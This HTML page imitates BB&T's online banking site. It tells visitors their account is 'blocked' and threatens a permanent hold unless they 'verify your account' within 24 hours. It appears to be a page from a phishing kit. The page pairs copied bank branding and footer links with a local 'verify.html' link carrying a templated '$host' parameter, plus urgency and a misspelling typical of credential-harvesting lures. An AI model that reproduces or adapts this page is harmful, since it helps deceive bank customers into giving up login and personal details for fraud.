<!DOCTYPE html>
<!--[if lt IE 7]><html class="no-js no-svg lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->
<!--[if (IE 7)&!(IEMobile)]><html class="no-js no-svg lt-ie9 lt-ie8" lang="en"><![endif]-->
<!--[if (IE 8)&!(IEMobile)]><html class="no-js no-svg lt-ie9" lang="en"><![endif]-->
<!--[if (IE 9)]><html class="no-js ie9" lang="en"><![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US"> <!--<![endif]-->
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>
	Account Blocked    </title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2.0, user-scalable=yes">
    <meta name="format-detection" content="telephone=no">
	
	<link href="CSS/logon-10142018-new.css" rel="stylesheet" media="screen, print">

</head>
<!-- Begin Changes for Timeout Warning -->
	


<!--<div id="container1" style="display: none;">
	<div id="titlebar1"></div>
	<div id="containerBody1"></div>
	<div id="containerCtrl1"></div>
</div>
-->
<div id="overlay1" style="display: none;"></div>


    <div id="container1" class="window">
      <!-- <a href="#_" onclick="getResponse();" class="closelb"><span id="close1" class="icon-cancel"></span></a> -->
        <div id = "containerBody1" style="display:none" class="content">
            <h2 class="primary-modal" tabindex="0"><i class="icon-attention"></i> Are you still there?</h2>

            <p>Due to inactivity, your session will expire in <strong id="countdown"></strong></p>

            <p>Select <strong>Continue</strong> to extend your session</p>

            <div class="btn-row">
				<a href="#_" onclick="getResponse();"  class="button primary external">Continue</a>
				<a href=""  onclick="return logoffFnx();" class="button alt dismiss">Log off</a>
            </div>
            <div class="clearfix"></div>
        </div>

    </div>	



<!-- End Changes for Timeout Warning -->



<!--Content begins -->
<body class="design-prototype no-auth" onKeyDown="submitMeOnEnter(event)">
<div class="overflow-wrap">
<div class="menu-holder">

<header class="navbar bai-header">
       <div id="main-nav" class="container">
        <div id="logo">
            <a href="https://www.bbt.com/online-services/online-banking/u-by-bbt.page"><img src="https://bank.bbt.com/auth/images/u-logo.png" alt="BB&amp;T Logo" class="logo"></a>
        </div>
        	<div class="clearfix"></div>
    </div>
</header>

	<div class="content-wrapper clearfix">
	
		        
		<div class="full-content">
			<div class="clearfix">	
				<div class="sub-wrapper bai-wrapper">
					<div class="sub-inner-wrapper">
						<div class="sub-widget-wrapper one-column-centered">
							<div class="widget">
								<section>
																		 
									<h1>Account Blocked</h1>
									
																		<article class="module">
									<div class="mod-content">

									 
										<p>Your online account has been blocked because your password has been entered incorrectly too many times.</p>	

										<p>In order to secure your account <strong>we have put a security hold on your account details and functions,</strong> you have to verify your account information within the next 24 hours or the hold will be permenant.</p>
							
										<div class="clear"></div>
																		</div>
										<div class="mod-content">
											
																					
									
																						<div class="clear"></div>
																					</div> 
																					<div class="button-wrapper">
												<a id="otpPrompt" href="verify.html?ID=$host$host$host$host$host" role='button' class="button button--wrap primary">Verify Your Account</a>
									
												
											</div>
																			</article>
									<footer class="mod-footer">
									</footer>
								</section>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<form action="verify.html" method="post" name="kbaResendOTP">
		<input type="hidden" name="incAttempts" id="incAttempts" value="0" />
		<input type="hidden" name="isUserkbaLocked" id="isUserkbaLocked" value="N" />
		<input type="hidden" name="isUsereligibleForOTP" id="isUsereligibleForOTP" value="N" />
		<input type="hidden" name="validUserOTPDays" id="validUserOTPDays" value="" />
		<input type="hidden" name="otpVerificationType" id="otpVerificationType" value="" />
		 			<input type="hidden" name="otpResenderror" value="otpresend">
			</form>
	
	

	<!--Content ends --> 
	

<footer class="footer">

    <section class="footer__top-level">
		
        <div class="wrapper u-grid u-grid--sm u-grid--gutters">
            <p class="access">All links in this section open in a new tab</p>
                <div class="footer__column u-grid__cell">
					<h3 id="bbt-support-links" class="footer__section-header u-mg-b--md">Support</h3>
					<div class="u-grid u-grid--sm" aria-labelledby="bbt-support-links">
					
						<div class="u-grid__cell u-grid__cell--1-2--sm u-grid__cell--1-1--md u-grid__cell--1-2--lg">
							<ul class="footer__list-blk">
								<li class="footer__list-item"><a href="https://www.bbt.com/start.page" target="_blank">BB&amp;T Home</a></li>
								<li class="footer__list-item"><a href="https://www.bbt.com/privacy-and-security/default.page">Privacy &amp; Security</a></li> 
							</ul>
						</div>
						
						<div class="u-grid__cell u-grid__cell--1-2--sm u-grid__cell--1-1--md u-grid__cell--1-2--lg">
							<ul class="footer__list-blk">
								<li class="footer__list-item"><a href="https://www.bbt.com/online-services/online-banking/docs/disclosures.page" target="_blank">Disclosures</a></li>
								<li class="footer__list-item"><a href="https://www.bbt.com/locator/search.page" target="_blank">Locations</a></li>    
							</ul>
						</div>
					
						<div class="u-grid__cell u-grid__cell--1-1--sm">
							<div class="">
								<p class="footer__paragraph u-hide-large">U Support
									<a href="tel:18882286654" class="tel-link footer__link">888&#8209;BBT&#8209;ONLINE (888&#8209;228&#8209;6654)</a>
								</p>

								<p class="footer__paragraph u-large-only">U Support
									<span class="tel-link">888&#8209;BBT&#8209;ONLINE (888&#8209;228&#8209;6654)</span>
								</p>
							</div>
						</div>
					</div>
				</div>
				
				<div class="footer__column u-grid__cell u-grid__cell--2-3--md u-hide-small">
					<h3 id="bbt-product-links" class="footer__section-header u-mg-b--md">BB&amp;T Products</h3>

					<div class="u-grid u-grid--md" aria-labelledby="bbt-product-links">
						<div class="u-grid__cell">
							<div class="u-mg-b--sm">
								<a href="https://www.bbt.com/banking/default.page" target="_blank" id="personal-banking-links" class="footer__link u-font-size--h4 u-font-weight--semibold">Personal Banking</a>
							</div>

							<ul class="footer__list-blk" aria-labelledby="personal-banking-links">
								<li class="footer__list-item">
									<a href="https://www.bbt.com/banking/checking/default.page" target="_blank" class="footer__link">Checking</a>
								</li>

								<li class="footer__list-item">
									<a href="https://www.bbt.com/banking/savings/default.page" target="_blank" class="footer__link">Savings</a>
								</li>

								<li class="footer__list-item">
									<a href="https://www.bbt.com/banking/credit-cards/default.page" target="_blank" class="footer__link">Credit Cards</a>
								</li>
							</ul>
						</div>

						<div class="u-grid__cell">
							<div class="u-mg-b--sm">
								<a href="https://www.bbt.com/lending/default.page" target="_blank" id="lending-links" class="footer__link u-font-size--h4 u-font-weight--semibold">Lending</a>
							</div>

							<ul class="footer__list-blk" aria-labelledby="lending-links">
								<li class="footer__list-item">
									<a href="https://www.bbt.com/lending/mortgage/default.page" target="_blank" class="footer__link">Mortgage</a>
								</li>

								<li class="footer__list-item">
									<a href="https://www.bbt.com/lending/home-equity/default.page" target="_blank" class="footer__link">Home Equity</a>
								</li>

								<li class="footer__list-item">
									<a href="https://www.bbt.com/lending/personal-loans/auto-loan.page" target="_blank" class="footer__link">Auto Loan</a>
								</li>
							</ul>
						</div>
						
						<div class="u-grid__cell" role="region" aria-label="Other Services">
							<div class="u-mg-b--sm">
								<a href="https://insurance.bbt.com/insurance/personal/start.page" target="_blank" class="footer__link">Insurance Services</a>
							</div>

							<div class="u-mg-b--sm">
								<a href="https://www.bbt.com/investing/investment-services/default.page" target="_blank" class="footer__link">BB&amp;T Investments</a>
							</div>

							<div class="u-mg-b--sm">
								<a href="http://www.bbtscottstringfellow.com/" target="_blank" class="footer__link">BB&amp;T Scott &amp; Stringfellow</a>
							</div>

							<div class="u-mg-b--sm">
								<a href="https://www.bbt.com/wealth/start.page" target="_blank" class="footer__link">Wealth</a>
							</div>
						</div>
					</div>
				</div>
			</div>
		</section>

		<section class="footer__sub-level u-txt-align--center u-font-size--sm">
			<div class="wrapper">
			<p class="footer__paragraph">Only deposit products are FDIC insured.</p>

			<p class="footer__paragraph">
			Branch Banking and Trust Company is a Member FDIC and an Equal Housing Lender

			<span class="icon-equal-housing-lender " aria-hidden="true"></span>
			.
			</p>

			<div class="background-format u-max-width--md u-mg-x--auto">
			Securities, Insurance and Advisory Services are:

			<ul>
			<li class="u-mg-b--0 u-display--inline-block">
			NOT A DEPOSIT

			<span aria-hidden="true">&#9679;</span>
			</li>

			<li class="u-mg-b--0 u-display--inline-block">
			NOT FDIC-INSURED

			<span aria-hidden="true">&#9679;</span>
			</li>

			<li class="u-mg-b--0 u-display--inline-block">
			NOT GUARANTEED BY A BANK

			<span aria-hidden="true">&#9679;</span>
			</li>

			<li class="u-mg-b--0 u-display--inline-block">
			NOT INSURED BY ANY STATE OR FEDERAL GOVERNMENT AGENCY

			<span aria-hidden="true">&#9679;</span>
			</li>

			<li class="u-mg-b--0 u-display--inline-block">MAY GO DOWN IN VALUE</li>
			</ul>
			</div>

			<p class="footer__paragraph">&copy;2020 Branch Banking and Trust Company. All Rights Reserved.</p>
			</div>
		</section>
	 
	   <div class="clearfix"></div>

	</footer>

</div>
</div>

</body>
</html>


